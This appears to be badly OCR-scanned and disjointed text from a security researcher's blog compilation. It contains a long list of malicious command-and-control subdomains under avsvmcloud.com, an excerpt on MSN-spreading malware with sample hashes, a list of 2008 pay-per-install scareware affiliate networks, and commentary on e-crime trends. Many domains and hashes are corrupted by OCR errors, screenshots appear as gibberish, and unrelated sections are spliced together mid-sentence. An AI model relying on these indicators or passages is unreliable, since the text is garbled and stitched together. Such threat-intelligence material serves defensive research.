rng46vpcufsdafooaf559up.appsync-api.us-west-2.avsvmcloud.com 
rnj8e4ndruvtlr3ovff59tg.appsync-api.us-west-2.avsvmcloud.com 
rpe5n7iki29iutfovf359ul.appsync-api.eu-west-1.avsvmcloud.com 
rgsmj8355visfrogmo74.appsync-api.us-east-1.avsvmcloud.com 
rrOlmpqgk9opb386eoip256uesuhrvi2.appsync-api.us-east-1l.avsvmcloud.com 
rrikk8aq6i9s91c56d6n0e6jOceu.appsync-api.us-east-1.avsvmcloud.com 
rs72mu61laloblb3nmmhv.appsync-api.us-west-2.avsvmcloud.com 
rt6pvls5vrjugo3gbo2t.appsync-api.us-west-2.avsvmcloud.com 
rt860l13p3j3kl03gjmc7.appsync-api.us-east-2.avsvmcloud.com 
rtralrcni8ameaiumoln3sv.appsync-api.us-west-2.avsvmcloud.com 
rvOdn8nf5tlsOfq60004vgimd18ak2o0b.appsync-api.us-east-1.avsvmcloud.com 
rv67|m38o03jti405e2sd0cdieo0ie2h.appsync-api.us-east-1.avsvmcloud.com 
rvrkscam6f0sq7356d6n026j02eu.appsync-api.us-east-1.avsvmcloud.com 
sOokoq231e6f9jlfmibh.appsync-api.us-east-2.avsvmcloud.com 

sOq69bopel 7och6f0r81.appsync-api.us-west-2.avsvmcloud.com 


S131pfib6s2q5dv7o0i6020u6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
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slb38eniqnonv6p65u0elel.appsync-api.us-east-2.avsvmcloud.com 
slbvirpo8tbeelo6rsvuio2vulOif7.appsync-api.us-east-2.avsvmcloud.com 
s21qs5mt7ah5iq782bmvf15.appsync-api.us-east-1.avsvmcloud.com 
s33pthc44ua9igk6e2q0b12eul.appsync-api.us-east-1.avsvmcloud.com 
s3bbqbvtkc3hptf7 wh60bun02wusouvO.appsync-api.us-east-1.avsvmcloud.com 
s3e0tg3gofeu0e97wouhOlovwrvorvi0.appsync-api.us-east-1.avsvmcloud.com 
s3ei81g6fadr2527e6vi0edsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
s3ei81g6fadr25s7e6vidodsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
5564d162vikulu6f8i2t.appsync-api.us-west-2.avsvmcloud.com 
sSupoijqcivp9j 7e8vqrp7k.appsync-api.us-east-2.avsvmcloud.com 
s67olf26av187hp6vwonou0be2h.appsync-api.us-west-2.avsvmcloud.com 
s6l0iu24v2j1s796urso2ve2sd0be2h.appsync-api.us-west-2.avsvmcloud.com 
s6pm8p76hnpqf7mb6eul.appsync-api.us-west-2.avsvmcloud.com 
S718c2in|9aosjo6jed1Ote2h.appsync-api.us-west-2.avsvmcloud.com 
s7ec4imn00ae5df7o0i60cou6iuir0irn.appsync-api.us-west-2.avsvmcloud.com 
s7jrsqlefscl1lq265hivOgun.appsync-api.us-west-2.avsvmcloud.com 

S88 7ouilpq0ij4n7q535z0i3rq1rii0g.appsync-api.us-east-2.avsvmcloud.com 
s8I5ios8jpj89r566g36ut2w0g2st.appsync-api.us-east-2.avsvmcloud.com 
s8rroneOhbta63j 7h2fvibovuo0e326d.appsync-api.us-east-2.avsvmcloud.com 
sa5ar21uts5b9ncl1tbvi.appsync-api.us-west-2.avsvmcloud.com 
sanavp1n8s169pclabrb.appsync-api.us-west-2.avsvmcloud.com 
sd7dcm1lotf4jcm6hsvks.appsync-api.eu-west-1.avsvmcloud.com 
sdjcolg43sc6fa73efnr41r.appsync-api.us-east-1.avsvmcloud.com 
sdncbs9k54hqt86h7f30.appsync-api.us-east-1.avsvmcloud.com 
seatat0605e9c461km4q.appsync-api.us-east-1.avsvmcloud.com 
sep36qleuue2h6ctg3hv377.appsync-api.eu-west-1.avsvmcloud.com 
ses8b6227700aclitkbuvr7f.appsync-api.us-east-1.avsvmcloud.com 
sf0q84qdutb323q6e06e202e2h.appsync-api.us-east-1.avsvmcloud.com 
sf6pf4m0qd401k260f8j5snmah.appsync-api.us-east-1.avsvmcloud.com 
sfmiskebdvsoqsm66d6n0t6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
sfobmbrek7mhitn7wh60oun0ewusouvo0.appsync-api.us-east-1.avsvmcloud.com 
sfqitl 1lbf0pro537e6vi0odsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
sfqitl 1lbf0pro587e6vi0edsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
sgfbfjtgOhat2k8700gudir2951ludivf.appsync-api.us-east-2.avsvmcloud.com 
sgl76n6her02qkc6cicObu7.appsync-api.us-east-2.avsvmcloud.com 
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sgm/7psfdpdhin257q535z0i3rq1rii0o.appsync-api.us-east-2.avsvmcloud.com 
sicikne4dr409u366d6n0b6j0oeu.appsync-api.us-east-1.avsvmcloud.com 
siflgorskO90nes6mvriNtj7.appsync-api.us-east-1.avsvmcloud.com 
sijovor3klchoak7wh60cun0OgwusouvO.appsync-api.us-east-1.avsvmcloud.com 
sispm3t1lbhflobpm7eoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
sj2h2et2iv8i4rm6e2mvridee2mO0ge2h.appsync-api.us-east-2.avsvmcloud.com 
sj37isikp49ig2k7q535z0g3rq1rii0t.appsync-api.us-east-2.avsvmcloud.com 
sjfoapmchlbiap2 700f2vorkkfgaaobd.appsync-api.us-east-2.avsvmcloud.com 
sjs8jtah96r4mbf6u3002st.appsync-api.us-east-2.avsvmcloud.com 
skenkoOclhs293l36rkv91k.appsync-api.us-west-2.avsvmcloud.com 
sknl10ieqvk6r906hiicu.appsync-api.us-east-2.avsvmcloud.com 
slo9bo5b7bteahn7wh60cunOowusouv0.appsync-api.us-west-2.avsvmcloud.com 
sman43ms6uuhdi580g8qIinok7 1gtsob4.appsync-api.eu-west-1.avsvmcloud.com 
sni7qOhi7evs296hkfkl.appsync-api.us-west-2.avsvmcloud.com 
snkgtdkclqhnn66hvvu5.appsync-api.us-east-2.avsvmcloud.com 
soldl53jrofi710700esqir575gu4nrp.appsync-api.us-east-1.avsvmcloud.com 
so3s/7kn3ldflpsk66refsworq0il2eul.appsync-api.us-east-1.avsvmcloud.com 
sobu56rbhn49ja965u021el1.appsync-api.us-east-1.avsvmcloud.com 
sot05|3noituaq97wouhOlovwrvorvi0.appsync-api.us-east-1.avsvmcloud.com 
sq740fsiqf4h00ctj3qvm7f.appsync-api.us-east-1.avsvmcloud.com 
sqmaij84otuke9l1c3jd.appsync-api.us-east-1.avsvmcloud.com 
sru54bhn940cf1f6c2d0te2h02dj.appsync-api.eu-west-1.avsvmcloud.com 
ssc6i66pqoolgic88btrf17.appsync-api.us-west-2.avsvmcloud.com 
stlOvt5n0414ppclso9p.appsync-api.us-west-2.avsvmcloud.com 
stgbhcfflnhr55clhmkj.appsync-api.us-east-2.avsvmcloud.com 
su9cbqij55h4m0c5531g.appsync-api.us-west-2.avsvmcloud.com 
surk8jj29gqbh475o0b0t.appsync-api.us-east-2.avsvmcloud.com 
sv25dohg9q9c37f6c2d0be2h0gdj.appsync-api.eu-west-1.avsvmcloud.com 
sv88cbcb7o05derv6e2q0el2eul.appsync-api.eu-west-1l.avsvmcloud.com 
t0g70pv3e9saekk3917b.appsync-api.us-east-1.avsvmcloud.com 
tlpur5in72rsifl8unsOoe2sd0oovirl.appsync-api.us-east-1.avsvmcloud.com 
tlu25pchk6sming8oi6O0touGiuirOgrn.appsync-api.us-east-1.avsvmcloud.com 
t2rlsqsb7aqasral5cibif9.appsync-api.us-east-2.avsvmcloud.com 
t3ekv1k80mhjqlp7srd6swOge2h.appsync-api.us-east-2.avsvmcloud.com 
t3tcm2p69a70csl8q535z0i3rq1rii0c.appsync-api.us-east-2.avsvmcloud.com 
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t8eo08dolhcjio42 76d6n0c6jOieu.appsync-api.us-east-1.avsvmcloud.com 
t97fodnOcspcr5s30gmv.appsync-api.us-east-2.avsvmcloud.com 
t99ed7j305ch2bk3c1q8.appsync-api.us-east-2.avsvmcloud.com 
t9gkpnt26bOlnns3ulda.appsync-api.us-west-2.avsvmcloud.com 
tac5181gpr8rsfO5p8bmov5.appsync-api.us-east-1.avsvmcloud.com 
tatthkqpv8qtrna5ocqbov7.appsync-api.eu-west-1.avsvmcloud.com 
tb26sfckflf7v4j8unhov02eu1lonf6e.appsync-api.us-west-2.avsvmcloud.com 
tbhjpg088087e4c7071mqtkrm1gheap.appsync-api.us-west-2.avsvmcloud.com 
tbifqqa3a49mpcl17e6u0g12eul.appsync-api.us-west-2.avsvmcloud.com 
tcalu6slgg74bli7e2q0c1l2eul.appsync-api.eu-west-1.avsvmcloud.com 
tcalu6slgg74bIn7e2q0012eul.appsync-api.eu-west-1.avsvmcloud.com 
tdjauiljtlemmoaf9lnbdf7.appsync-api.us-west-2.avsvmcloud.com 
te29gsr8p2gl02a5vcmvov5.appsync-api.us-east-2.avsvmcloud.com 
tejsil8ur65nkna8tj40.appsync-api.us-west-2.avsvmcloud.com 
tf5rbb8unnm59pm7vnr4tur5h.appsync-api.us-east-2.avsvmcloud.com 
tf79n272mhi0trn8q22nsf55096uqprs.appsync-api.us-east-2.avsvmcloud.com 
tg62088835h63nc8eoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
tgao5p3dhlbip2e76d6n0t6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
tgao5p3dhlbip2m76d6n0g6jOceu.appsync-api.us-east-1.avsvmcloud.com 
tghcifuvivOskq1800mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
tghcifuvivOskq5800mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
thbah7gpr07nbps3agul.appsync-api.us-west-2.avsvmcloud.com 
thdsp9j2g70kcns3tggc.appsync-api.us-west-2.avsvmcloud.com 
ti4rdo4g4fe4ttu8hfiful252hu3ucuv.appsync-api.us-east-2.avsvmcloud.com 
tivhrvpredt9rr78vrinreo602v60212.appsync-api.us-east-2.avsvmcloud.com 
tkpjs3m1c2omff0fjg4bpfr.appsync-api.us-east-1.avsvmcloud.com 
tml0Oeuav96phrjb800mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
tmm73g42nq8hlkg80i60o0o0u6iuir0irn.appsync-api.us-west-2.avsvmcloud.com 
tmrjlidjkdekoa08wh60oun02wusouvO.appsync-api.us-west-2.avsvmcloud.com 
tmvre30c69667f18ds2n0e3uho1i2v00.appsync-api.us-west-2.avsvmcloud.com 
toqfpaaqcfvo5pu800esau3m9jOgtovm.appsync-api.us-east-2.avsvmcloud.com 
tp1lc2tfoku9dd0se519u.appsync-api.us-west-2.avsvmcloud.com 
tqj9redgvg428ma5a88movv.appsync-api.us-east-2.avsvmcloud.com 
trr24hh4h7664ar7guswo60tluc.appsync-api.us-west-2.avsvmcloud.com 
ts2g3lobvfqqq4oalcjbmrf7.appsync-api.us-east-1.avsvmcloud.com 
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compatibility from the perspective of easily obtaining the accounting data to be [7]used as 
foundation for another MSN spreading malware or [8]spim, compared to accessing it from an 
email account. 


File size: 888832 bytes 
MD5: 02b0d887aalcbfd4f602de83f79cf571 
SHA1: da49527e96bb998b3763c1d45db97a4d3bccea7a 


A sample is detected as W32/VB-Remote-TClient-based! Maximus. 
In [9]related news, MSN is said to be the most targeted IM client : 


"Within the IM category, 19 percent of threats were reported on the AOL Instant Mes- 
senger network, 45 percent on MSN Messenger, 20 percent on Yahoo! Instant Messenger 
and 15 percent on all other IM networks including Jabber-based IM private networks. Attacks 
on these private networks have more than doubled in share since 2003, rising from seven 
percent of all IM attacks to 15 percent in 2007." 


As always, it’s a matter of a vendor’s sensors network to come up with increasing or de- 
creasing levels of a particular threat, but the pragmatic reality nowadays has to do with less 
IM spreading malware, and much, much more [10]malware embedded trusted web sites. 


2,440 


Moreover, according to some [11 ]publicly obtainable stats, IM spreading malware in general 
has been declining for the past two years, but how come? It’s because of their broken and bit 
outdated social engineering model, namely the lack of messages localization, abuse of public 
events as windows of opportunities, and the lack of any kind of segmentation. One-to-many 
may be logical from an efficiency point of view, but it’s like embedding a single exploit on 
hundreds of thousands of sites compared to a set of exploits, or a set of techniques like in this 
case. 


1. http://seclists.org/fulldisclosure/2007/Aug/0411.htm 
2. http: //ddanchev. blogspot .com/2007/08/diy-phishing-kits .htm 
ttp://ddanchev.blogspot.com/2007/08/diy-phishing-kits_29.htm 


3. 

4. http://ddanchev. blogspot .com/2007/10/diy-german-malware-dropper.htm 
5. http: //ddanchev. blogspot. com/2007/09/diy-phishing-kit-goes-20.htm 
6. 
7. 
8. 


ttp://ddanchev.blogspot.com/2007/09/diy-exploits-embedding-tools.htm 


ttp://ddanchev. blogspot .com/2007/10/thousands-of-im-screen-names-in-wild.htm 


ttp://ddanchev.blogspot.com/2007/05/msn- spamming-bot .htm 
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ttavm1ft6hlu0fk8ucb7.appsync-api.us-east-1.avsvmcloud.com 
ttdskrdudhpb14a5i6gmbvf.appsync-api.us-east-1.avsvmcloud.com 
ttr9s8jOki4lb6s5ajkmbvl.appsync-api.eu-west-1.avsvmcloud.com 
tvmsmpr9nrub9ml7t1fOee2h.appsync-api.us-west-2.avsvmcloud.com 
tvt2f17hnoh0106800q49s20f12ql200.appsync-api.us-west-2.avsvmcloud.com 
u03sd682qc0osn63traq.appsync-api.us-west-2.avsvmcloud.com 
u06d9gspmrljg2636r2a.appsync-api.us-west-2.avsvmcloud.com 
uOcedjleqksorj633re4.appsync-api.us-west-2.avsvmcloud.com 
uOpriu2k8gv8ul632r1l.appsync-api.us-west-2.avsvmcloud.com 
uOroa353m02Ikichnvfr9vd.appsync-api.us-west-2.avsvmcloud.com 
uOvsuuorv6évanb6hgrer2vd.appsync-api.us-west-2.avsvmcloud.com 
ulemrh79c839hel8e30g12eul.appsync-api.us-east-2.avsvmcloud.com 
u249pq5vvkeig8c1k3jrmf7.appsync-api.eu-west-1.avsvmcloud.com 
u335qd4fftnt884900iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
u3eicd2|pmjob4b86d6n0t6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
u3eicd2|pmjob4u86d6n0b6jO2eu.appsync-api.us-east-1.avsvmcloud.com 
u3ucl3ff87ugh478tvef0il2eul.appsync-api.us-east-1.avsvmcloud.com 
u4ocibd15u9ijcllcotviff.appsync-api.us-east-1.avsvmcloud.com 
u5bkb7ujvvhujkc3u3ua.appsync-api.us-west-2.avsvmcloud.com 
u5dppqeado3fcp6huicb2vp.appsync-api.us-west-2.avsvmcloud.com 
u5g2004i08sj2j6hgvOr4vk.appsync-api.us-east-2.avsvmcloud.com 
u5pv999p1lelsee63lilr.appsync-api.us-west-2.avsvmcloud.com 
u6i3eqc3ss9vdcO08eb6u0i12eul.appsync-api.us-west-2.avsvmcloud.com 
u6ra9sc9dmneob66900mudofi7 5f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
u7|3fe6tsO5vb8I8e6u0i12eul.appsync-api.us-west-2.avsvmcloud.com 
u7|lvrpvObtqubkr900mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
u8p6ki08450s3f580bwu0of6.appsync-api.us-east-2.avsvmcloud.com 
u8pl7ven8i4knnu9e2sdO0oGisuif6vri.appsync-api.us-east-2.avsvmcloud.com 
u9tbk2i54p29k97hkf3r2vr.appsync-api.us-east-1.avsvmcloud.com 
u9tndt8r0p42hl73ffo0.appsync-api.us-east-1.avsvmcloud.com 
uclp7naijbe7a6880ce2h.appsync-api.us-west-2.avsvmcloud.com 
uccbkqt4l2sb15e8euheoip0tl2eul.appsync-api.us-west-2.avsvmcloud.com 
ue4btu4rm3g980c5nmkvbv9.appsync-api.us-east-1.avsvmcloud.com 
uf2bb6rhn7qhfep9wh60iunOewusouvO.appsync-api.us-east-1.avsvmcloud.com 


uf2bb6rhn7qhfer9wh60oun0ewusouv0.appsync-api.us-east-1.avsvmcloud.com 
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ufenocumi4b0jbv8coO0ce2sd.appsync-api.us-east-1.avsvmcloud.com 
ufgiaderpv6044886d6n0i6jOteu.appsync-api.us-east-1.avsvmcloud.com 
ufgiaderpv6044e86d6n006jObeu.appsync-api.us-east-1.avsvmcloud.com 
ug9b6nbv962i6ne891.appsync-api.us-east-2.avsvmcloud.com 
ugrh86s478m9tjq9nhwOcG6iuirO2vwOi.appsync-api.us-east-2.avsvmcloud.com 
ugri0juovl9hh9l8uosafuloipO22st.appsync-api.us-east-2.avsvmcloud.com 
ui0d72v648lr96i9uhsOee2sd0eovirl.appsync-api.us-east-1.avsvmcloud.com 
uiai0Dpedprbod2886d6n0b6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
uidpastj 7df8i9p8vwonou0ee2h.appsync-api.us-east-1.avsvmcloud.com 
uinnoOpgltikbvi9uhsOge2sdOiovirl.appsync-api.us-east-1.avsvmcloud.com 
uitniBuqiq60gol8co0ce2sd.appsync-api.us-east-1.avsvmcloud.com 
uitniBuqiq60go98co0ce2sd.appsync-api.us-east-1.avsvmcloud.com 
ujbr6gpomj5p0ml90i602o0u6iuirO2rn.appsync-api.us-east-2.avsvmcloud.com 
ujqt8bf40005sfu8h.appsync-api.us-east-2.avsvmcloud.com 
ulavip89rtslffs8d3ucu3uhu60e2st.appsync-api.us-west-2.avsvmcloud.com 
ulfmcf44qd58t9e82w.appsync-api.us-west-2.avsvmcloud.com 
uligade12dfflta8nrliun60trvi.appsync-api.us-west-2.avsvmcloud.com 
ult052kct4j60fo900h24orh1ng4tofu.appsync-api.us-west-2.avsvmcloud.com 
uo859p4hfuptlcj900iesdbOvfheOl45.appsync-api.us-east-1.avsvmcloud.com 
uo8igvgkvsirh9b9e6viNedsovertr2s.appsync-api.us-east-1l.avsvmcloud.com 
uokn20hil5gk4v59uhsOie2sdO02ovirl.appsync-api.us-east-1.avsvmcloud.com 
uoti7p2kpboor2j86d6n006jOceu.appsync-api.us-east-1.avsvmcloud.com 
up4b08vkr218007flilvpfd.appsync-api.eu-west-1.avsvmcloud.com 
up8mdeghttmdc9cehfgd.appsync-api.eu-west-1.avsvmcloud.com 
up8vjfh85f50696ftvfrdfg.appsync-api.us-east-1.avsvmcloud.com 
upa05n86lcurpd6f9v3vdfd.appsync-api.us-east-1l.avsvmcloud.com 
usafvod5epjof3ctrb3n.appsync-api.us-west-2.avsvmcloud.com 
utg1cuo5bh17huc8734n.appsync-api.us-west-2.avsvmcloud.com 
utj9r10uv4nupuc8jo46.appsync-api.us-west-2.avsvmcloud.com 
uvc9m27b5brbqns80gfj.appsync-api.eu-west-1.avsvmcloud.com 
v292digu3|l858vhj50etvuh.appsync-api.us-east-2.avsvmcloud.com 
v2jlgjo8chh8h4en1ljdk.appsync-api.us-west-2.avsvmcloud.com 
v3671bokobrb5ts9e2sd0t6uvu0ce2h.appsync-api.us-west-2.avsvmcloud.com 
v75r3enf4k83ikha004sdjfefgee7600.appsync-api.us-east-1.avsvmcloud.com 
v77h5nkjd374r7d9tvef0b12eul.appsync-api.us-east-1.avsvmcloud.com 
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v98kmimasr8sf9p2v7m5esd.appsync-api.us-west-2.avsvmcloud.com 
va6mvveét3bll2pgoj4g.appsync-api.us-east-1.avsvmcloud.com 
vabg53fi32k5j6pug8fums1.appsync-api.us-east-1.avsvmcloud.com 
vb096g3p60mg3979u30g2st.appsync-api.us-east-2.avsvmcloud.com 
vb9jst38ptlhlugaovirsvul0t3q60i2.appsync-api.us-east-2.avsvmcloud.com 
vb9u8elfnbj6nknaoi60cou6iuirOorn.appsync-api.us-east-2.avsvmcloud.com 
vbbm5drktqh88hvcaovirsvul0c3q6022.appsync-api.us-east-2.avsvmcloud.com 
vclh1inOodf14d779tvef0212eul.appsync-api.us-east-1.avsvmcloud.com 
vc8dk0u83al79ic90e2st.appsync-api.us-east-1.avsvmcloud.com 
vcemk5dukadr/7t4ha00esau3m9jOqtovm.appsync-api.us-east-1l.avsvmcloud.com 
vdpofdm5j8jla3epv6l3.appsync-api.us-west-2.avsvmcloud.com 
vfu4rlfpmrfkd159fo60tjrvid2rnf.appsync-api.us-west-2.avsvmcloud.com 
vgkhu501q3q77j79uit0c12eul.appsync-api.eu-west-1.avsvmcloud.com 
vgve6mdppbgpt289ir0ev7.appsync-api.eu-west-1.avsvmcloud.com 
vi3f2e8c4o0evdto9orc0ot20eon.appsync-api.us-west-2.avsvmcloud.com 

vijfok7 mbunn8cnaexr09ovirsvu100e.appsync-api.us-west-2.avsvmcloud.com 
vinhpqtlbpd7a3haoi60o0ouG6iuir0irn.appsync-api.us-west-2.avsvmcloud.com 
viqObl2gfpotfdr9e6u0e12eul.appsync-api.us-west-2.avsvmcloud.com 
vjOmo9lh6nuh9un9Yc2d0be2hO0gdj.appsync-api.eu-west-1.avsvmcloud.com 
vkp3s4orh1lsqjhoglothur.appsync-api.us-east-1.avsvmcloud.com 
vl063pmg000203qaeoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
vl0k73rpbnrscs6alu6rs60g6iuir0el.appsync-api.us-east-1.avsvmcloud.com 
viksOs9quptur6eae6viNtdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
vilsn8cqcg9khla96d6n0g6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
vloefu4bsf6o00|9a00mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
vm05sk8bgd6239vaun0c2dioho7r1lp0g.appsync-api.us-east-2.avsvmcloud.com 
vnadh4sqdfaro4hov 7/tthtr.appsync-api.us-east-1.avsvmcloud.com 
vnt603v91m2848eor73t9un.appsync-api.us-east-1.avsvmcloud.com 
vpmb9j3mgé6mhjceptl7t.appsync-api.us-east-2.avsvmcloud.com 
vrh5Injsgqo2hhnaun022dioho7r1lp0e.appsync-api.us-east-2.avsvmcloud.com 
vtl4600dhqmjOueui6pu3s0.appsync-api.us-east-1.avsvmcloud.com 
vvv8q9e0oh5q6u3aen60o0eudoluv2f0c.appsync-api.us-east-2.avsvmcloud.com 


Stay tuned! 
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2021 


17.1 January 


17.1.1 Dancho Danchev’s Security Research for ZDNet’s Zero Day Blog - Official Mul- 
tiple E-Book Formats Compilation (2021-01-01 15:28) 


[1] 
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“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008 - 
2012 


BY DANCHO DANCHEV 


Dear blog readers, 


I’ve decided to let everyone know that | just released an official security research compilation 
for all the blog posts that | did for ZDNet’s Zero Day blog circa 2008-2012 with the idea to 
make it easier for everyone to catch up in terms of what I’ve been up to in terms of research 
throughout that period of time in multiple E-book format full offline copies. 


Grab a copy from [2]here. 


Stay tuned! 


1. https://1.bp. blogspot . com/-pw3VG7S17dg/X- 7YH6yS jXI/AAAAAAAALSY/NVISWUF-pooSyZFKJQxUeCACN21Y9A8wgCLcBGAsYHQ 
s2048/Dancho_Danchev_Security_Research_ZDNet_Zero_Da 


2. https://archive. org/details/dancho-danchev-security-research-zdnet-zero-day-blog 
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17.1.2. Dancho Danchev’s Security Research for Webroot Inc - Official Multiple E- 
Book Formats Compilation (2021-01-01 15:28) 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 

SI 


Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


Dear blog readers, 


Do you remember my work for Webroot Inc. which was my ex-employer 2012-2014? Great 
news. I’ve decided to make an official offline multiple E-book formats official security research 
compilation of all the blog [1]posts that | did for Webroot Inc. throughout 2012-2014 with the 
idea to make it easier for my readers to catch up in terms of what I’ve been up to in terms of 
research throughout 2012-2014. 


Grab a copy from [2]here. 


Stay tuned! 
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1. https://www.webroot.com/blog/ 
2. https: //archive. org/details/dancho-danchev-security-research-webroot 


17.1.3 Exposing the Pay Per Install Underground Business Model - Historical OSINT 
- An Analysis - 2008 (2021-01-06 22:49) 


What are some of the primary scareware and adware distributors circa 2008? Which were the 
most profitable pay-pay-install and drive-by-download affiliate-network based revenue-sharing 
scheme malicious and fraudulent scareware and adware pushing providers circa 2008? Who 
was providing them with the necessary infrastructure to help them stay online and earn 
fraudulent profit in the processes of pushing fake security software also known as scareware 
including adware to hundreds of thousands of unsuspecting users online? Keep reading. 


In this exclusive analysis I'll provide actionable intelligence on some of the major rogue 
and fraudulent pay-per-install and drive-by-download scareware and adware pushing affiliate- 
network based type of rogue providers circa 2008 and discuss in-depth the tactics techniques 
and procedures of the cybercriminals behind these affiliate-networks including actionable 
intelligence on the infrastructure behind these campaigns. 


Sample Key Pay-Per-Install and Drive-by-Download Affiliate-Networks that I’ll expose in this 
analysis circa 2008 include: 


e LuxeCash 

¢ LoudMo 

¢ Adware Dollars 

¢ GoldenCashWorld 
* CodecMoney 

¢ Earnings4you 

¢ EXE Revenue 


* Go-Go-Cash 


InstallConverter 


InstallerCash 
¢ Junior VIP 
* Oxocash 
¢ Snap Installs 


* Spicy Codec 
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The Installs 

¢ Traf Cash 

¢ Vomba Cash 

¢ Wave Revenue 
¢ Ya Bucks 

¢ Yazzle 

e Zango Cash 

e 3XL Parnership 
* Cash Boom 

¢ Cash Codec 

¢ Cash Wrestler 
¢ Buckware 

¢ Bakasoftware 
¢ Cash Panic 

* Dogma Software 
¢ K2Cash 

¢ Traffic Converter 
* VipSoft Cash 

* Dailybucks 

e EU Pays 

¢ Golden Cash 

¢ Profit Cash 

¢ Ruler Cash 

¢ Sex Profit 

¢ VIP Convert 

¢ Stimul Cash 


Sample Screenshots of some of the key pay per install affiliate programs circa 2008: 
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[1] 


[2] 
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9. http://www.reuters.com/article/pressRelease/idUS152187+08- Jan-2008+BW20080108 
10. http: //ddanchev.blogspot .com/2007/07/malware-embedded-sites- increasing. htm 


11. http://tc.imlogic.com/threatcenterportal/pubIframe. aspx 


4.1.11 E-crime and Socioeconomic Factors (2008-01-21 15:17) 


HOME USERS ENTERPRISES «= PARTNERS 


scone 


SMAGL 
Businesses Conte 


Experts map out future malware creation hotspots 


Images shew e-crime evolution revealing Mexico, Indie and Africa 


Jen 37 


7008 


Most of today’s Intermet criminals are operating from Russia, China and Souther 
America. Over the eent five pears, there will be « significant mecrease @ attacks from 


Central America, India, China and Africa, according to a prediction frem secertty Sa 
spectalsts, 


The researchers at f-Secure's Securty Labs have mapped the shifts in Internet crime trends since 
1986. The theee maps Delow depect how commouter cree has evolved and show a shut from Europe 
and North Amenca to emerging markets 


1. The Past (1986-2003) 


paling Usts 
Aer ards anal Bunt oxpa theres: 
Irrees tir Mele tenns 


twert (obender 
Marketing 
J 
=) eer onset 
a * © Old-school views writers operating from areas in Europe, United States, Austrabe and Inde 
PaoOUCTS © Era Charactersed by oppeetunane ‘hodbrists” bearreng thew craft 
# werront 2. Recent history (2003-2007): 


o* powntoans 
f PRESS & NEWS 


= wie. 


“CONTACTS 


ore 


Pech 


Interesting [1]points by F-Secure with two main issues covered, namely the lack of employ- 
ment opportunities for skilled IT people who turn to cyber crime to make a living, and the 
emerging economies across the globe, whose citizens in their early stages of embracing new 
economic models will suffer from the inevitable unequal distribution of income due to their 
government’s lack of experience or motivation. To me, however, it’s more sociocultural than 
socioeconomic factors that contribute to these future developments. Several more key points 
worth discussing : 


- Malware is no longer created, it’s being generated 


The myth of someone reinventing the wheel, namely coding a malware bot from scratch 
is no longer realistic. Modern malware is open source, modular, localized to different 
languages, comes with extensive documentation/comments and HOWTO guides/videos. 
Moreover, these publicly obtainable open source malware bots were released in the wild for 
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[3] 
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Jyawum napTiicpam — AyYWM OTAbIx! 


[4] 
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Sample Screenshot of Bakasoftware: 
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Nome Codie Kowtante: 


ME EpyTR ay Mac Soe 


| bakasoftware 


BPEMA JENATb PEASIDHBIE REHDIV 


war #1 war #2 war #3 war #4 war #5 


OL/ LOK AdvancedxPtiner [otpaboran) 
Cet Antes zx Ady axe DOF om , . aa 
mernate 20 2hae . se Crores OX 
- ——— = os 
mon08 
Cmene nagonet . 


mens 


Chena naponer 


Senvfid [orpatoran] 
8 UtARK GERONDOHOCTH, NEDO HD BLOX SELBywT EK Genter Haewewes SS — 
NapPOh HOMO NONperTL 230 CewTeion @ ace y mpede. cnecHbo 32 movemieee. mes pasoToEH or pare so teetioa.s waar tas 
arm enc :) ae SOrmeNeS 4 Ofrs > 


KG Ok 


Banna tes 


Sample Screenshot of Bakasoftware’s Admin Interface: 


[10] 
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BakaSoltware 


Mozilla Firefox 
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free, namely, the coders that originally started the "generators" or the "compilers" generation 
took, and enjoyed only the fame that came with coming up with the most widely used and 
successful bot family. Take Pinch for instance and the recent arrest of the "coders". New and 
improved versions of Pinch are making their rounds online, but how is this possible since the 
people behind it are no longer able to update it? To achieve immortality for Pinch, they’ve 
released it aS open source tool, namely anyone can use its successful foundation for any 
other upcoming innovation. The original coders are gone, the "malware generators" and 
the "compilers" are cheering since they still have access to the tool. Another popular entry 
obstacle such as advanced coding skills is gone, anyone can compile, generate and spread 
the samples, or used them for targeted attacks. 


- "Will code malware for food" type of individuals don’t really exist anymore 


A cat doesn’t eat mice when it’s hungry, it eats mice when it’s already been fed, and 
therefore does it for prestige and entertainment. Storm Worm is not released by the "desper- 
ation department", it’s an investment on behalf of someone who will monetize the infected 
hosts, or who has outsourced the infection process to botnet aggregators. Moreover, there’s 
no lack of IT employment opportunities in times of growing economy, exactly the opposite, 
the economy is booming, investments are made in networks and infrastructure and therefore 
people will start receiving incentives for training and therefore the demand for IT experts will 
increase given the government is visionary enough to invest in the long-term, in terms of 
